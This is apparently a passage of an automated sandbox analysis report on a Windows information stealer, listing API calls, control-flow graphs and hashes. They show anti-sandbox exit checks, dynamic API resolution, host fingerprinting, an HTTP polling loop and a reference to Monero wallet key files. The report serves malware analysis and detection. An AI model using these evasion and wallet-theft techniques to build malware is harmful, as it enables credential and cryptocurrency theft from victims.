                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                  • String ID: ERROR$ERROR$GET
                  • API String ID: 3749127164-2509457195
                  • Opcode ID: b33cd813b1706f02dcd7cf5823dc1bee293dceb01aef9a382369ac7b74f208e5
                  • Instruction ID: 056d8573c82c635a11a25ee84cbf97b08445409132863facb0e1be6f8df57c23
                  • Opcode Fuzzy Hash: b33cd813b1706f02dcd7cf5823dc1bee293dceb01aef9a382369ac7b74f208e5
                  • Instruction Fuzzy Hash: E4714071A00218ABDB24DFA0DD95FEE77B8FB49700F108158F50A6B5D0DBB46A85CF92

                  Control-flow Graph

                  control_flow_graph 1275 9b78e0-9b7937 GetProcessHeap RtlAllocateHeap GetComputerNameA 1276 9b7939-9b793e 1275->1276 1277 9b7942-9b7945 1275->1277 1278 9b7962-9b7972 1276->1278 1277->1278
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009B7910
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009B7917
                  • GetComputerNameA.KERNEL32(?,00000104), ref: 009B792F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateComputerNameProcess
                  • String ID:
                  • API String ID: 1664310425-0
                  • Opcode ID: c44bcc3be535dcd2d97d95cb010cbce0db59a98d03669b7f48850a397ad2f55a
                  • Instruction ID: 9ae094267869d3f9d8e48f222a78404672e4ead41c1cc0b1eb1f641255022352
                  • Opcode Fuzzy Hash: c44bcc3be535dcd2d97d95cb010cbce0db59a98d03669b7f48850a397ad2f55a
                  • Instruction Fuzzy Hash: 6C0186B1904248EBC710DF94DD45BAAFBBCF744B21F104219F545E7280D77459008BA2
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009A11B7), ref: 009B7880
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009B7887
                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 009B789F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateNameProcessUser
                  • String ID:
                  • API String ID: 1296208442-0
                  • Opcode ID: 57cb7c3c3207d416afed08548e04727fc4b6ead9e4f4da8bc2f865655ad598f0
                  • Instruction ID: 69fea295450ad6eeeb85ffb7a835423b0e66dd3da18bbe5cae8724e6a6e4c4bf
                  • Opcode Fuzzy Hash: 57cb7c3c3207d416afed08548e04727fc4b6ead9e4f4da8bc2f865655ad598f0
                  • Instruction Fuzzy Hash: DDF044B1944248ABC700DF94DD85BAEFBBCE744721F100659F605A3680D77825048BA1
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitInfoProcessSystem
                  • String ID:
                  • API String ID: 752954902-0
                  • Opcode ID: bed1bedc8b3ba0a3fa76a24774cdf5dce96f5afda0c75f848c07d564504cd07a
                  • Instruction ID: c6b3f62f3fe3d61db8ec3b6d64c1e1dd96db557e1a974326e671578a6c1001ca
                  • Opcode Fuzzy Hash: bed1bedc8b3ba0a3fa76a24774cdf5dce96f5afda0c75f848c07d564504cd07a
                  • Instruction Fuzzy Hash: 9CD05E7490430CDBCB00DFE0D8896DDBB7CFB08312F000655E90563340EE306881CAA6

                  Control-flow Graph

                  control_flow_graph 633 9b9c10-9b9c1a 634 9b9c20-9ba031 GetProcAddress * 43 633->634 635 9ba036-9ba0ca LoadLibraryA * 8 633->635 634->635 636 9ba0cc-9ba141 GetProcAddress * 5 635->636 637 9ba146-9ba14d 635->637 636->637 638 9ba153-9ba211 GetProcAddress * 8 637->638 639 9ba216-9ba21d 637->639 638->639 640 9ba298-9ba29f 639->640 641 9ba21f-9ba293 GetProcAddress * 5 639->641 642 9ba337-9ba33e 640->642 643 9ba2a5-9ba332 GetProcAddress * 6 640->643 641->640 644 9ba41f-9ba426 642->644 645 9ba344-9ba41a GetProcAddress * 9 642->645 643->642 646 9ba428-9ba49d GetProcAddress * 5 644->646 647 9ba4a2-9ba4a9 644->647 645->644 646->647 648 9ba4ab-9ba4d7 GetProcAddress * 2 647->648 649 9ba4dc-9ba4e3 647->649 648->649 650 9ba515-9ba51c 649->650 651 9ba4e5-9ba510 GetProcAddress * 2 649->651 652 9ba612-9ba619 650->652 653 9ba522-9ba60d GetProcAddress * 10 650->653 651->650 654 9ba61b-9ba678 GetProcAddress * 4 652->654 655 9ba67d-9ba684 652->655 653->652 654->655 656 9ba69e-9ba6a5 655->656 657 9ba686-9ba699 GetProcAddress 655->657 658 9ba708-9ba709 656->658 659 9ba6a7-9ba703 GetProcAddress * 4 656->659 657->656 659->658
                  APIs
                  • GetProcAddress.KERNEL32(74DD0000,015D6EB0), ref: 009B9C2D
                  • GetProcAddress.KERNEL32(74DD0000,015D6ED0), ref: 009B9C45
                  • GetProcAddress.KERNEL32(74DD0000,015EA498), ref: 009B9C5E
                  • GetProcAddress.KERNEL32(74DD0000,015EA4B0), ref: 009B9C76
                  • GetProcAddress.KERNEL32(74DD0000,015EA4C8), ref: 009B9C8E
                  • GetProcAddress.KERNEL32(74DD0000,015EA558), ref: 009B9CA7
                  • GetProcAddress.KERNEL32(74DD0000,015DCBA8), ref: 009B9CBF
                  • GetProcAddress.KERNEL32(74DD0000,015EDC88), ref: 009B9CD7
                  • GetProcAddress.KERNEL32(74DD0000,015EDC40), ref: 009B9CF0
                  • GetProcAddress.KERNEL32(74DD0000,015EDCB8), ref: 009B9D08
                  • GetProcAddress.KERNEL32(74DD0000,015EDCD0), ref: 009B9D20
                  • GetProcAddress.KERNEL32(74DD0000,015D70F0), ref: 009B9D39
                  • GetProcAddress.KERNEL32(74DD0000,015D7110), ref: 009B9D51
                  • GetProcAddress.KERNEL32(74DD0000,015D7150), ref: 009B9D69
                  • GetProcAddress.KERNEL32(74DD0000,015D6E30), ref: 009B9D82
                  • GetProcAddress.KERNEL32(74DD0000,015EDCE8), ref: 009B9D9A
                  • GetProcAddress.KERNEL32(74DD0000,015EDD60), ref: 009B9DB2
                  • GetProcAddress.KERNEL32(74DD0000,015DCFB8), ref: 009B9DCB
                  • GetProcAddress.KERNEL32(74DD0000,015D6E50), ref: 009B9DE3
                  • GetProcAddress.KERNEL32(74DD0000,015EDCA0), ref: 009B9DFB
                  • GetProcAddress.KERNEL32(74DD0000,015EDDA8), ref: 009B9E14
                  • GetProcAddress.KERNEL32(74DD0000,015EDD18), ref: 009B9E2C
                  • GetProcAddress.KERNEL32(74DD0000,015EDE50), ref: 009B9E44
                  • GetProcAddress.KERNEL32(74DD0000,015D6EF0), ref: 009B9E5D
                  • GetProcAddress.KERNEL32(74DD0000,015EDE68), ref: 009B9E75
                  • GetProcAddress.KERNEL32(74DD0000,015EDC58), ref: 009B9E8D
                  • GetProcAddress.KERNEL32(74DD0000,015EDDC0), ref: 009B9EA6
                  • GetProcAddress.KERNEL32(74DD0000,015EDDD8), ref: 009B9EBE
                  • GetProcAddress.KERNEL32(74DD0000,015EDD90), ref: 009B9ED6
                  • GetProcAddress.KERNEL32(74DD0000,015EDDF0), ref: 009B9EEF
                  • GetProcAddress.KERNEL32(74DD0000,015EDC70), ref: 009B9F07
                  • GetProcAddress.KERNEL32(74DD0000,015EDD00), ref: 009B9F1F
                  • GetProcAddress.KERNEL32(74DD0000,015EDE08), ref: 009B9F38
                  • GetProcAddress.KERNEL32(74DD0000,015EB188), ref: 009B9F50
                  • GetProcAddress.KERNEL32(74DD0000,015EDD48), ref: 009B9F68
                  • GetProcAddress.KERNEL32(74DD0000,015EDB80), ref: 009B9F81
                  • GetProcAddress.KERNEL32(74DD0000,015D6E70), ref: 009B9F99
                  • GetProcAddress.KERNEL32(74DD0000,015EDD30), ref: 009B9FB1
                  • GetProcAddress.KERNEL32(74DD0000,015D6C70), ref: 009B9FCA
                  • GetProcAddress.KERNEL32(74DD0000,015EDD78), ref: 009B9FE2
                  • GetProcAddress.KERNEL32(74DD0000,015EDE20), ref: 009B9FFA
                  • GetProcAddress.KERNEL32(74DD0000,015D6B70), ref: 009BA013
                  • GetProcAddress.KERNEL32(74DD0000,015D6B90), ref: 009BA02B
                  • LoadLibraryA.KERNEL32(015EDE38,?,009B5CA3,009C0AEB,?,?,?,?,?,?,?,?,?,?,009C0AEA,009C0AE3), ref: 009BA03D
                  • LoadLibraryA.KERNEL32(015EDB98,?,009B5CA3,009C0AEB,?,?,?,?,?,?,?,?,?,?,009C0AEA,009C0AE3), ref: 009BA04E
                  • LoadLibraryA.KERNEL32(015EDBB0,?,009B5CA3,009C0AEB,?,?,?,?,?,?,?,?,?,?,009C0AEA,009C0AE3), ref: 009BA060
                  • LoadLibraryA.KERNEL32(015EDBC8,?,009B5CA3,009C0AEB,?,?,?,?,?,?,?,?,?,?,009C0AEA,009C0AE3), ref: 009BA072
                  • LoadLibraryA.KERNEL32(015EDBE0,?,009B5CA3,009C0AEB,?,?,?,?,?,?,?,?,?,?,009C0AEA,009C0AE3), ref: 009BA083
                  • LoadLibraryA.KERNEL32(015EDBF8,?,009B5CA3,009C0AEB,?,?,?,?,?,?,?,?,?,?,009C0AEA,009C0AE3), ref: 009BA095
                  • LoadLibraryA.KERNEL32(015EDC10,?,009B5CA3,009C0AEB,?,?,?,?,?,?,?,?,?,?,009C0AEA,009C0AE3), ref: 009BA0A7
                  • LoadLibraryA.KERNEL32(015EDC28,?,009B5CA3,009C0AEB,?,?,?,?,?,?,?,?,?,?,009C0AEA,009C0AE3), ref: 009BA0B8
                  • GetProcAddress.KERNEL32(75290000,015D6BB0), ref: 009BA0DA
                  • GetProcAddress.KERNEL32(75290000,015EE060), ref: 009BA0F2
                  • GetProcAddress.KERNEL32(75290000,015E9BF8), ref: 009BA10A
                  • GetProcAddress.KERNEL32(75290000,015EE0A8), ref: 009BA123
                  • GetProcAddress.KERNEL32(75290000,015D6AD0), ref: 009BA13B
                  • GetProcAddress.KERNEL32(734C0000,015DCD38), ref: 009BA160
                  • GetProcAddress.KERNEL32(734C0000,015D6CF0), ref: 009BA179
                  • GetProcAddress.KERNEL32(734C0000,015DD030), ref: 009BA191
                  • GetProcAddress.KERNEL32(734C0000,015EE0C0), ref: 009BA1A9
                  • GetProcAddress.KERNEL32(734C0000,015EDFA0), ref: 009BA1C2
                  • GetProcAddress.KERNEL32(734C0000,015D6D10), ref: 009BA1DA
                  • GetProcAddress.KERNEL32(734C0000,015D6C30), ref: 009BA1F2
                  • GetProcAddress.KERNEL32(734C0000,015EDF40), ref: 009BA20B
                  • GetProcAddress.KERNEL32(752C0000,015D6A90), ref: 009BA22C
                  • GetProcAddress.KERNEL32(752C0000,015D6B50), ref: 009BA244
                  • GetProcAddress.KERNEL32(752C0000,015EDF88), ref: 009BA25D
                  • GetProcAddress.KERNEL32(752C0000,015EE0F0), ref: 009BA275
                  • GetProcAddress.KERNEL32(752C0000,015D6BD0), ref: 009BA28D
                  • GetProcAddress.KERNEL32(74EC0000,015DCC98), ref: 009BA2B3
                  • GetProcAddress.KERNEL32(74EC0000,015DCBD0), ref: 009BA2CB
                  • GetProcAddress.KERNEL32(74EC0000,015EE0D8), ref: 009BA2E3
                  • GetProcAddress.KERNEL32(74EC0000,015D6D30), ref: 009BA2FC
                  • GetProcAddress.KERNEL32(74EC0000,015D6D50), ref: 009BA314
                  • GetProcAddress.KERNEL32(74EC0000,015DCE00), ref: 009BA32C
                  • GetProcAddress.KERNEL32(75BD0000,015EDEE0), ref: 009BA352
                  • GetProcAddress.KERNEL32(75BD0000,015D6D70), ref: 009BA36A
                  • GetProcAddress.KERNEL32(75BD0000,015E9C08), ref: 009BA382
                  • GetProcAddress.KERNEL32(75BD0000,015EE108), ref: 009BA39B
                  • GetProcAddress.KERNEL32(75BD0000,015EDEB0), ref: 009BA3B3
                  • GetProcAddress.KERNEL32(75BD0000,015D6AF0), ref: 009BA3CB
                  • GetProcAddress.KERNEL32(75BD0000,015D6BF0), ref: 009BA3E4
                  • GetProcAddress.KERNEL32(75BD0000,015EE120), ref: 009BA3FC
                  • GetProcAddress.KERNEL32(75BD0000,015EDEF8), ref: 009BA414
                  • GetProcAddress.KERNEL32(75A70000,015D6B10), ref: 009BA436
                  • GetProcAddress.KERNEL32(75A70000,015EDFD0), ref: 009BA44E
                  • GetProcAddress.KERNEL32(75A70000,015EDE80), ref: 009BA466
                  • GetProcAddress.KERNEL32(75A70000,015EE030), ref: 009BA47F
                  • GetProcAddress.KERNEL32(75A70000,015EE018), ref: 009BA497
                  • GetProcAddress.KERNEL32(75450000,015D6D90), ref: 009BA4B8
                  • GetProcAddress.KERNEL32(75450000,015D6C90), ref: 009BA4D1
                  • GetProcAddress.KERNEL32(75DA0000,015D69B0), ref: 009BA4F2
                  • GetProcAddress.KERNEL32(75DA0000,015EDFE8), ref: 009BA50A
                  • GetProcAddress.KERNEL32(6F070000,015D69D0), ref: 009BA530
                  • GetProcAddress.KERNEL32(6F070000,015D69F0), ref: 009BA548
                  • GetProcAddress.KERNEL32(6F070000,015D6CB0), ref: 009BA560
                  • GetProcAddress.KERNEL32(6F070000,015EE048), ref: 009BA579
                  • GetProcAddress.KERNEL32(6F070000,015D6C10), ref: 009BA591
                  • GetProcAddress.KERNEL32(6F070000,015D6A10), ref: 009BA5A9
                  • GetProcAddress.KERNEL32(6F070000,015D6A30), ref: 009BA5C2
                  • GetProcAddress.KERNEL32(6F070000,015D6CD0), ref: 009BA5DA
                  • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 009BA5F1
                  • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 009BA607
                  • GetProcAddress.KERNEL32(75AF0000,015EDE98), ref: 009BA629
                  • GetProcAddress.KERNEL32(75AF0000,015E9C28), ref: 009BA641
                  • GetProcAddress.KERNEL32(75AF0000,015EE138), ref: 009BA659
                  • GetProcAddress.KERNEL32(75AF0000,015EE078), ref: 009BA672
                  • GetProcAddress.KERNEL32(75D90000,015D6C50), ref: 009BA693
                  • GetProcAddress.KERNEL32(6CFB0000,015EE168), ref: 009BA6B4
                  • GetProcAddress.KERNEL32(6CFB0000,015D6A50), ref: 009BA6CD
                  • GetProcAddress.KERNEL32(6CFB0000,015EDF10), ref: 009BA6E5
                  • GetProcAddress.KERNEL32(6CFB0000,015EDEC8), ref: 009BA6FD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: HttpQueryInfoA$InternetSetOptionA
                  • API String ID: 2238633743-1775429166
                  • Opcode ID: e7fc0c4d18ab85464c4b2f2c5651587b7104e7360296d750c97d33bdd217f67c
                  • Instruction ID: 6efa1febd29ddcff47fd73ef1db7c4469bb4fc9909dddd0fd52083761942a743
                  • Opcode Fuzzy Hash: e7fc0c4d18ab85464c4b2f2c5651587b7104e7360296d750c97d33bdd217f67c
                  • Instruction Fuzzy Hash: 9A6219B9500280AFC354DFA8EDD89663BFDF78C701715851EA609CB264DE39B881DB63

                  Control-flow Graph

                  control_flow_graph 858 9b5510-9b5577 call 9b5ad0 call 9ba820 * 3 call 9ba740 * 4 874 9b557c-9b5583 858->874 875 9b55d7-9b564c call 9ba740 * 2 call 9a1590 call 9b52c0 call 9ba8a0 call 9ba800 call 9baad0 StrCmpCA 874->875 876 9b5585-9b55b6 call 9ba820 call 9ba7a0 call 9a1590 call 9b51f0 874->876 901 9b5693-9b56a9 call 9baad0 StrCmpCA 875->901 906 9b564e-9b568e call 9ba7a0 call 9a1590 call 9b51f0 call 9ba8a0 call 9ba800 875->906 892 9b55bb-9b55d2 call 9ba8a0 call 9ba800 876->892 892->901 908 9b56af-9b56b6 901->908 909 9b57dc-9b5844 call 9ba8a0 call 9ba820 * 2 call 9a1670 call 9ba800 * 4 call 9b6560 call 9a1550 901->909 906->901 912 9b57da-9b585f call 9baad0 StrCmpCA 908->912 913 9b56bc-9b56c3 908->913 1038 9b5ac3-9b5ac6 909->1038 932 9b5991-9b59f9 call 9ba8a0 call 9ba820 * 2 call 9a1670 call 9ba800 * 4 call 9b6560 call 9a1550 912->932 933 9b5865-9b586c 912->933 917 9b571e-9b5793 call 9ba740 * 2 call 9a1590 call 9b52c0 call 9ba8a0 call 9ba800 call 9baad0 StrCmpCA 913->917 918 9b56c5-9b5719 call 9ba820 call 9ba7a0 call 9a1590 call 9b51f0 call 9ba8a0 call 9ba800 913->918 917->912 1018 9b5795-9b57d5 call 9ba7a0 call 9a1590 call 9b51f0 call 9ba8a0 call 9ba800 917->1018 918->912 932->1038 939 9b598f-9b5a14 call 9baad0 StrCmpCA 933->939 940 9b5872-9b5879 933->940 969 9b5a28-9b5a91 call 9ba8a0 call 9ba820 * 2 call 9a1670 call 9ba800 * 4 call 9b6560 call 9a1550 939->969 970 9b5a16-9b5a21 Sleep 939->970 948 9b587b-9b58ce call 9ba820 call 9ba7a0 call 9a1590 call 9b51f0 call 9ba8a0 call 9ba800 940->948 949 9b58d3-9b5948 call 9ba740 * 2 call 9a1590 call 9b52c0 call 9ba8a0 call 9ba800 call 9baad0 StrCmpCA 940->949 948->939 949->939 1043 9b594a-9b598a call 9ba7a0 call 9a1590 call 9b51f0 call 9ba8a0 call 9ba800 949->1043 969->1038 970->874 1018->912 1043->939
                  APIs
                    • Part of subcall function 009BA820: lstrlen.KERNEL32(009A4F05,?,?,009A4F05,009C0DDE), ref: 009BA82B
                    • Part of subcall function 009BA820: lstrcpy.KERNEL32(009C0DDE,00000000), ref: 009BA885
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009B5644
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009B56A1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009B5857
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                    • Part of subcall function 009B51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009B5228
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                    • Part of subcall function 009B52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009B5318
                    • Part of subcall function 009B52C0: lstrlen.KERNEL32(00000000), ref: 009B532F
                    • Part of subcall function 009B52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 009B5364
                    • Part of subcall function 009B52C0: lstrlen.KERNEL32(00000000), ref: 009B5383
                    • Part of subcall function 009B52C0: lstrlen.KERNEL32(00000000), ref: 009B53AE
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009B578B
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009B5940
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009B5A0C
                  • Sleep.KERNEL32(0000EA60), ref: 009B5A1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen$Sleep
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 507064821-2791005934
                  • Opcode ID: bfcc98ab30c860de7772a0d3d261fe1dfdd5a1d83981cb8db655cb3d83f52493
                  • Instruction ID: 3c453489d4fb02c7ef7c730fe078e13f8b82ab07c535d9f2ba3f558a8be88f80
                  • Opcode Fuzzy Hash: bfcc98ab30c860de7772a0d3d261fe1dfdd5a1d83981cb8db655cb3d83f52493
                  • Instruction Fuzzy Hash: 4BE10E71D10208AACB14FBA0DE96FED737CAFD4310F508528B50667591EF34AA09CBA2

                  Control-flow Graph (rendered graph with executed / not-executed node colouring; image not reproduced)
                  APIs
                  • StrCmpCA.SHLWAPI(00000000,block), ref: 009B17C5
                  • ExitProcess.KERNEL32 ref: 009B17D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID: block
                  • API String ID: 621844428-2199623458
                  • Opcode ID: 7c6809c975e4ac50520e9a4c9700e4865835f6b0a032f541b911202016aa22a9
                  • Instruction ID: 142e1b618b552ed430d4eb17038cacdfa46244bb01c50f9829d4f36e73007446
                  • Opcode Fuzzy Hash: 7c6809c975e4ac50520e9a4c9700e4865835f6b0a032f541b911202016aa22a9
                  • Instruction Fuzzy Hash: 835174B4A04249EFDB04DFA0EAA8BFE77B9BF84754F504458E4066B340D774E941CB62

                  Control-flow Graph (rendered graph with executed / not-executed node colouring; image not reproduced)
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 009B7542
                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009B757F
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009B7603
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009B760A
                  • wsprintfA.USER32 ref: 009B7640
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                  • String ID: :$C$\
                  • API String ID: 1544550907-3809124531
                  • Opcode ID: 80414e140db39335638c43d35350a04cbec8e979dc7061eb4297732715c759f2
                  • Instruction ID: e9f247415ecf69e364b725bfac5aeb705b3b1d2a7aa9c3220e0e8790c4c5eeb0
                  • Opcode Fuzzy Hash: 80414e140db39335638c43d35350a04cbec8e979dc7061eb4297732715c759f2
                  • Instruction Fuzzy Hash: A641B4B1D04248EBDF10DF94DD95BDEBBB8EF88710F100599F5096B280DB786A44CBA6

                  Control-flow Graph

                  APIs
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015E3060), ref: 009B98A1
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015E2F40), ref: 009B98BA
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015E30D8), ref: 009B98D2
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015E3030), ref: 009B98EA
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015E3108), ref: 009B9903
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015E9CD8), ref: 009B991B
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015D6F30), ref: 009B9933
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015D6F70), ref: 009B994C
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015E2FD0), ref: 009B9964
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015E3048), ref: 009B997C
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015E3000), ref: 009B9995
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015E2FB8), ref: 009B99AD
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015D6DB0), ref: 009B99C5
                    • Part of subcall function 009B9860: GetProcAddress.KERNEL32(74DD0000,015E2FE8), ref: 009B99DE
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009A11D0: ExitProcess.KERNEL32 ref: 009A1211
                    • Part of subcall function 009A1160: GetSystemInfo.KERNEL32(?), ref: 009A116A
                    • Part of subcall function 009A1160: ExitProcess.KERNEL32 ref: 009A117E
                    • Part of subcall function 009A1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 009A112B
                    • Part of subcall function 009A1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 009A1132
                    • Part of subcall function 009A1110: ExitProcess.KERNEL32 ref: 009A1143
                    • Part of subcall function 009A1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 009A123E
                    • Part of subcall function 009A1220: __aulldiv.LIBCMT ref: 009A1258
                    • Part of subcall function 009A1220: __aulldiv.LIBCMT ref: 009A1266
                    • Part of subcall function 009A1220: ExitProcess.KERNEL32 ref: 009A1294
                    • Part of subcall function 009B6770: GetUserDefaultLangID.KERNEL32 ref: 009B6774
                    • Part of subcall function 009A1190: ExitProcess.KERNEL32 ref: 009A11C6
                    • Part of subcall function 009B7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009A11B7), ref: 009B7880
                    • Part of subcall function 009B7850: RtlAllocateHeap.NTDLL(00000000), ref: 009B7887
                    • Part of subcall function 009B7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 009B789F
                    • Part of subcall function 009B78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009B7910
                    • Part of subcall function 009B78E0: RtlAllocateHeap.NTDLL(00000000), ref: 009B7917
                    • Part of subcall function 009B78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 009B792F
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,015E9C18,?,009C110C,?,00000000,?,009C1110,?,00000000,009C0AEF), ref: 009B6ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 009B6AE8
                  • CloseHandle.KERNEL32(00000000), ref: 009B6AF9
                  • Sleep.KERNEL32(00001770), ref: 009B6B04
                  • CloseHandle.KERNEL32(?,00000000,?,015E9C18,?,009C110C,?,00000000,?,009C1110,?,00000000,009C0AEF), ref: 009B6B1A
                  • ExitProcess.KERNEL32 ref: 009B6B22
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                  • String ID:
                  • API String ID: 2525456742-0
                  • Opcode ID: 75b0abaa828bb042ee799af7b18ae297bb0cae5c7c4f60c781e2759eb455f79b
                  • Instruction ID: 2e99fdeb3c1b9c3babf8c2fffa81838bc1a55b93c206824c20be7f637d472f75
                  • Opcode Fuzzy Hash: 75b0abaa828bb042ee799af7b18ae297bb0cae5c7c4f60c781e2759eb455f79b
                  • Instruction Fuzzy Hash: B8314C70D04208AADB04FBF0DE96BEE7778AFC4720F504518F212A6192DF746905C7A6

                  Control-flow Graph (rendered graph with executed / not-executed node colouring; image not reproduced)
                  APIs
                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 009A123E
                  • __aulldiv.LIBCMT ref: 009A1258
                  • __aulldiv.LIBCMT ref: 009A1266
                  • ExitProcess.KERNEL32 ref: 009A1294
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                  • String ID: @
                  • API String ID: 3404098578-2766056989
                  • Opcode ID: 3fffc31c3cf4049110ba8cec0baaa8a0a94b4d5f3703bd05bf7051d9b9ae393a
                  • Instruction ID: 3e5c22c65681b0987b02910951984b90ea4e918265003974958bec01380e07b1
                  • Opcode Fuzzy Hash: 3fffc31c3cf4049110ba8cec0baaa8a0a94b4d5f3703bd05bf7051d9b9ae393a
